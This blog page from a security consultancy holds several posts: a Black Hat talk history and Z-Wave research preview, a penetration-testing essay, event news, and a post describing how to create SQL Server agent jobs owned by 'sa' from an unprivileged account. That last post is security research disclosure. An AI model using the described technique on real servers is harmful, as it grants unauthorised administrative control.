Grey bar Blue bar
Share this:

Sat, 1 Jun 2013

Honey, I’m home!! - Hacking Z-Wave & other Black Hat news

You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.


Under the hood, the Zigbee and Z-wave wireless communication protocols are the most common used RF technology in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security researches. Z-wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical radio band (ISM). It transmits on the 868.42 MHz (Europe) and 908.42MHz (United States) frequencies designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.


Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol except once during a DefCon 2011 talk when the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and show how the Z-Wave protocol can be subjected to attacks.


The talk is being presented by Behrang Fouladi a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured how to clone the SecureID software token.


Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:



2002: Setiri : Advances in trojan technology (Roelof Temmingh)


Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it got referenced by in a 2004 book by Ed Skoudis.


2003: Putting the tea back into cyber terrorism (Charl van der Walt, Roelof Temmingh and Haroon Meer)


A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually lead to the creation of Maltego.


2004: When the tables turn (Charl van der Walt, Roelof Temmingh and Haroon Meer)


This paper presented some of the earliest ideas on offensive strike-back as a network defence methodology, which later found their way into Neil Wyler's 2005 book "Aggressive Network Self-Defence".


2005: Assessment automation (Roelof Temmingh)


Our thinking around pentest automation, and in particular footprinting and link analyses was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".


2006: A tail of two proxies (Roelof Temmingh and Haroon Meer)


In this talk we literally did introduce two proxy tools. The first was "Suru', our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been bypassed by excellent tools like "Burp Proxy" it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.


Another pioneering MITM proxy - WebScarab from OWASP - also shifted thinking at the time. It was originally written by Rogan Dawes, our very own pentest team leader.


The second proxy we introduced operated at the TCP layer, leveraging off the very excellent Scappy packet manipulation program. We never took that any further, however.


2007: It's all about timing (Haroon Meer and Marco Slaviero)


This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.


2008: Pushing a camel through the eye of a needle (Haroon Meer, Marco Slaviero & Glenn Wilkinson)


In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.


2009: Clobbering the cloud (Haroon Meer, Marco Slaviero and Nicholas Arvanitis)


Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in are discussed. The cloud offerings from Amazon, Salesforce and Apple as well as their security were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Daizovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.


2010: Cache on delivery (Marco Slaviero)


This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped and we've to-date had almost 50,000 hits on the presentation on Slideshare.


2011: Sour pickles (Marco Slaviero)


Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outline hurdles facing a shellcoder and provide guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library.We also wrote a very fancy paper about it all...


We never presented at Black Hat USA in 2012, although we did do some very cool work in that year.


For this year's show we'll back on the podium with Behrang's talk, as well an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.


See you in Vegas!

Wed, 8 Aug 2012

Privilege Escalation in SQL Server (Depending on some dodgy requirements)

I was playing with a few SQL server idiosyncrasies more than a year ago before becoming so completely distracted with the whole SAP protocol-decoding business. Having some time on my hands for once, I thought I would blog it.

Early last year, I found it possible to create jobs owned by other users on MS SQL Server (2000, 2005 and 2008) by an unprivileged user - providing the user had the capability of creating or altering stored procedures in the [master].[dbo] schema. The reason for this, comes as a result of cross-database permissions being chained, by default, across the system databases [master], [msdb] and [tempdb]. According to Microsoft, this is by design.

Where the issue comes in is that should a lower-privileged user have the capability of creating or altering stored procedures within [master].[dbo], it now becomes possible to insert records into the [msdb].[dbo].[sysjobs*] by executing the stored procedure - even without having any direct access to insert records into these tables. This is not particularly different from other system stored procedures (such as sp_addjob, for example) which allow users to create jobs, but the difference comes in in terms of the data we're allowed to populate.

SQL Server allows jobs and job steps to be executed under the context of specific user accounts. Whilst the majority of users (by default) are able to schedule jobs on the SQL Server, they can only schedule jobs which execute under their own account context and only members of the sysadmin server roles can add jobs which execute under the context of other user accounts. The underlying system stored procedures provided by Microsoft (sp_addjob and similar) prevent this functionality from being abused by lower privileged users. However, should it be possible to create/alter a stored procedure within [master].[dbo], we can insert records into the various [msdb] job tables with data of our choosing.

Hard-coding the [owner_sid] field in [msdb].[dbo].[sysjobs] to 0x01 (the default sid for the 'sa' user account) and the [database_user_name] field in [msdb].[dbo].[sysjobsteps] to 'sa' will allow us to create a job and associated job-step owned by the 'sa' user even though we are using an unprivileged account and do not have any permissions on the underlying tables.

In the following image, user eoppoc has no direct access to [msdb].[dbo].[sysjobs].

Executing a stored procedure, however, allows this access.

The following two images show the job created us user 'sa', with a single job step configured to execute as user 'sa'.

Honestly, I don't really see this as any form of issue. In order for it to be exploitable, there are far too many prerequisites and requirements and these prerequisites open other cans of worms. Furthermore, whilst one has the capability to schedule jobs to run as other users, one does not have the privilege level required to update the job cache. This means the newly created and scheduled job will only run after the SQL Server Agent has been restarted. It is nevertheless interesting and blog-worthy. And who knows, maybe this will be interesting / useful to somebody.

A zip file containing a procedure for SQL2000, and a procedure for SQL2005/2008 can be downloaded from here.

Oh - as a final note, Microsoft mentions that: "These databases are strictly system databases and is recommended not to create any user objects in these databases".

/ian

Wed, 9 May 2012

Pentesting in the spotlight - a view

As 44Con 2012 starts to gain momentum (we'll be there again this time around) I was perusing some of the talks from last year's event...

It was a great event with some great presentations, including (if I may say) our own Ian deVilliers' *Security Application Proxy Pwnage*. Another presentation that caught my attention was Haroon Meer's *Penetration Testing considered harmful today*. In this presentation Haroon outlines concerns he has with Penetration Testing and suggests some changes that could be made to the way we test in order to improve the results we get. As you may know a core part of SensePost's business, and my career for almost 13 years, has been security testing, and so I followed this talk quite closely. The raises some interesting ideas and I felt I'd like to comment on some of the points he was making.

As I understood it, the talk's hypothesis could be (over) simplified as follows:

  1. Despite all efforts the security problem is growing and we're heading towards a 'security apocalypse';
  2. Penetration Testing has been presented as a solution to this problem;
  3. Penetration Testing doesn't seem to be working - we're still just one 0-day away from being owned - even for our most valuable assets;
  4. One of the reasons for this is that we don't cater for the 0-day, which is a game-changer. 0-day is sometimes overemphasized, but mostly it's underemphasized, making the value of the test spurious at best;
  5. There are some ways in which this can be improved, including the use '0-day cards', which allow the tester to emulate the use of a 0-day on a specific system without needing to actually have one. Think of this like a joker in a game of cards.
To begin with, let's consider the term "Penetration Testing", which sits at the core of the hypotheses. This term is widely used to express a number of security testing methodologies and could also be referred to as "attack & penetration", "ethical hacking", "vulnerability testing" or "vulnerability assessment". At SensePost we use the latter term, and the methodology it expresses includes a number of phases of which 'penetration testing' - the attempt to actually leverage the vulnerabilities discovered and practically demonstrate their potential impact to the business - is only one. The talk did not specify which specific definition of Penetration Test he was using. However, given the emphasis later in the talk about the significance of the 0-day and 'owning' things, I'm assuming he was using the most narrow, technical form of the term. It would seem to me that this already impacts much of his assertion: There are cases of course where a customer wants us simply to 'own' something, or somethings, but most often Penetration Testing is performed within the context of some broader assessment within which many of Haroon's concerns may already be being addressed. As the talk pointed out, there are instances where the question is asked "can we breached?", or "can we be breached without detecting it?". In such cases a raw "attack and penetration" test can be exactly what's needed; indeed it's a model that's been used by the military for decades. However for the most part penetration testing should only be used as a specific phase in an assessment and to achieve a specific purpose. I believe many services companies, including our own, have already evolved to the point where this is the case.

Next, I'd like to consider the assertion that penetration testing or even security assessment is presented as the "solution" to the security problem. While it's true that many companies do employ regular testing, amongst our customers it's most often used as a part of a broader strategy, to achieve a specific purpose. Security Assessment is about learning. Through regular testing, the tester, the assessment team and the customer incrementally understand threats and defenses better. Assumptions and assertions are tested and impacts are demonstrated. To me the talk's point is like saying that cholesterol testing is being presented as a solution to heart attacks. This seems untrue. Medical testing for a specific condition helps us gauge the likelihood of someone falling victim to a disease. Having understood this, we can apply treatments, change behavior or accept the odds and carry on. Where we have made changes, further testing helps us gauge whether those changes were successful or not. In the same way, security testing delivers a data point that can be used as part of a general security management process. I don't believe many people are presenting testing as the 'solution' to the security problem.

It is fair to say that the entire process within which security testing functions is not having the desired effect; Hence the talk's reference to a "security apocalypse". The failure of security testers to communicate the severity of the situation in language that business can understand surely plays a role here. However, it's not clear to me that the core of this problem lies with the testing component.

A significant, and interesting component of the talk's thesis has to do with the role of "0-day" in security and testing. He rightly points out that even a single 0-day in the hands of an attacker can completely change the result of the test and therefore the situation for the attacker. He suggests in his talk that the testing teams who do have 0-day are inclined to over-emphasise those that they have, whilst those who don't have tend to underemphasize or ignore their impact completely. Reading a bit into what he was saying, you can see the 0-day as a joker in a game of cards. You can play a great game with a great hand but if your opponent has a joker he's going to smoke you every time. In this the assertion is completely true. The talk goes on to suggest that testers should be granted "0-day cards", which they can "play" from time to time to be granted access to a particular system and thereby to illustrate more realistically the impact a 0-day can have. I like this idea very much and I'd like to investigate incorporating it into the penetration testing phase for some of our own assessments.

What I struggle to understand however, is why the talk emphasizes the particular 'joker' over a number of others that seems apparent to me. For example, why not have a "malicious system administrator card", a "spear phishing card", a "backdoor in OTS software" card or a "compromise of upstream provider" card? As the 'compromise' of major UK sites like the Register and the Daily Telegraph illustrate there are many factors that could significantly alter the result of an attack but that would typically fall outside the scope of a traditional penetration test. These are attack vectors that fall within the victim's threat model but are often outside of their reasonable control. Their existence is typically not dealt with during penetration testing, or even assessment, but also cannot be ignored. This doesn't doesn't invalidate penetration testing itself, it simply illustrates that testing is not equal to risk management and that risk management also needs to consider factors beyond the client's direct control.

The solution to this conundrum was touched on in the presentation, albeit very briefly, and it's "Threat Modeling". For the last five years I've been arguing that system- or enterprise-wide Threat Modeling presents us with the ability to deal with all these unknown factors (and more) and perform technical testing in a manner that's both broader and more efficient.

The core of the approach I'm proposing is roughly based on the Microsoft methodology and looks as follows:

  1. Develop a model of your target environment, incorporating all players, locations, and interfaces. This is done in close collaboration between the client and the tester, thus incorporating both the 'insider' and the 'outsider' perspective;
  2. Enumerate all potential risks, and map them to the model. This results in a very long and comprehensive list of hypothetical risks, which would naturally include the 0-day, but also all the other 'jokers' that we discussed above;
  3. Sort the list into some order of priority and group similar hypothetical risks together;
  4. Perform tests in order of priority where appropriate to prove or disprove the hypothetical risks;
  5. Remediate, mitigate, insure or inform as appropriate;
  6. Rinse and repeat.
This approach provides a reasonable balance between solid theoretical risk management and aggressive technical testing that addresses all the concerns raised in the talk about the way penetration testing is done today. It also provides the customer with a concrete register of tested risks that can easily be updated from time-to-time and makes sense to both technical and business leaders.

Threat Modeling makes our testing smarter, broader, more efficient and more relevant and as such is a vital improvement to our risk assessment methodology.

Solving the security problem in total is sadly still going to take a whole lot more work...

ITWeb Security Summit 2012

This year, for the fourth time, myself and some others here at SensePost have worked together with the team from ITWeb in the planning of their annual Security Summit. A commercial conference is always (I suspect) a delicate balance between the different drivers from business, technology and 'industry', but this year's event is definitely our best effort thus far. ITWeb has more than ever acknowledged the centrality of good, objective content and has worked closely with us as the Technical Committee and their various sponsors to strike the optimal balance. I don't think we have it 100% right yet, and there are some improvements and initiatives that will unfortunately only manifest at next year's event, but this year's program (here and here) is nevertheless first class and comparable with almost anything else I've seen.

Dominic White was interviewed for a short video that sums it all up quite nicely.

<Shameless plug>If you're in South Africa, and you haven't registered, I highly recommend that you do</Shameless plug>
This year's Summit explores the idea that trust in CyberSpace is "broken" and that, one for one, all the pillars we relied on to tame the Internet and make it a safe place to do business in, have failed. Basically the event poses the question: "What now"?

We've tried hard to get all our speakers to align in some way with this theme. Sadly, as is often he case, we had fewer submissions from local experts then we hoped, but we were able to round up a pretty killer program, including an VIP list of visiting stars.

After the plenaries each day, the program is divided into themed tracks where talks on a topic are grouped together. Where possible we've tried to include as many different perspectives and opinions as possible. Here's a brief summary of my personal highlights:

Plenaries:

Mobility:
  • Charl van der Walt (me!) - "What's the deal with Mobile and Africa"
  • Tyrone Erasmus (MWR) - "Pilfering information from the masses"
Enterprise Resource Planning:
  • Juan Pablo Perez Etchegoyen (Onapsis) - "Cyber-Attacks on SAP & ERP systems: Is Our Business-Critical Infrastructure Exposed?"
  • Chris John Riley - "SAP (in)security: Scrubbing SAP clean with SOAP"
  • Ian de Villiers (SensePost) - "Systems Applications Proxy Pwnage"
Electronic Money:
  • Jon Matonis - "Cryptography in a World of Digital Currencies"
Security & Politics:
Finally, there's excellent looking full-day workshop titled "Security in an era of BYOD" with Dan Crisp and Lynn Terwoerds.

Its gonna be excellent. See you there!

Tue, 6 Dec 2011

Competition winner announced

On Saturday Dec 3, at BSides Cape Town we announced the winner of a prize for local information security research. The purpose of the competition was twofold. Firstly, to highlight interesting research produced in .za for the purpose of publicising up 'n coming security folks, since there are a few disparate communities (academic / industry is the greatest split). Secondly, to provide some degree of reward in the form of a cash prize. The prize is (unsurprisingly) not meant to compensate for time spent, but rather to give the typical researcher who conducts the work in their spare time some recognition and perhaps a cool gadget to associate with the work.

The competition was a little disappointing for a single, but significant, reason: the lack of nominations. In all, six people nominated three pieces of work from two researchers. Considering there were four security conferences this year in South Africa, it's not possible that even a reasonable minority of the research produced was considered for the prize. This was a no-strings-attached cash prize; there is no handover of IP or copyright, and no requirements on the winner (though we do offer an interview on our blog to publicise their work, should they choose to). With this in mind, it's strange how few nominations were received; for example, while the competition received some coverage on Twitter, very few nominations originated from there. The timing was tight (competition announced two weeks prior to BSides), but that only accounts for a smaller circumference, not a lack of involvement.

The two nominees were:

Given the small number of nominations, the panel was composed of three SensePost'ers, Dominic, Ian and myself.

The! winner! of! the! R5000! prize! was! Etienne! Stalmans!

In addition, a finder's fee of R500 was offered to the person who nominated the winning entry. Etienne received two nominations, and so a coin was flipped to determine who got the fee; Samuel Hunter was the winner.

Thanks to the Pieter for organising BSides Cape Town and providing us a spot to announce the winners, and thanks to everyone who sent in a nomination. Compliments to both nominees for having their work recognised by others in the community, and congratulations to Etienne for winning the prize.

We remain committed to research and the sponsorship concept, so expect an announcement towards the end of next year and keep an eye open during the year for research that strikes you as interesting.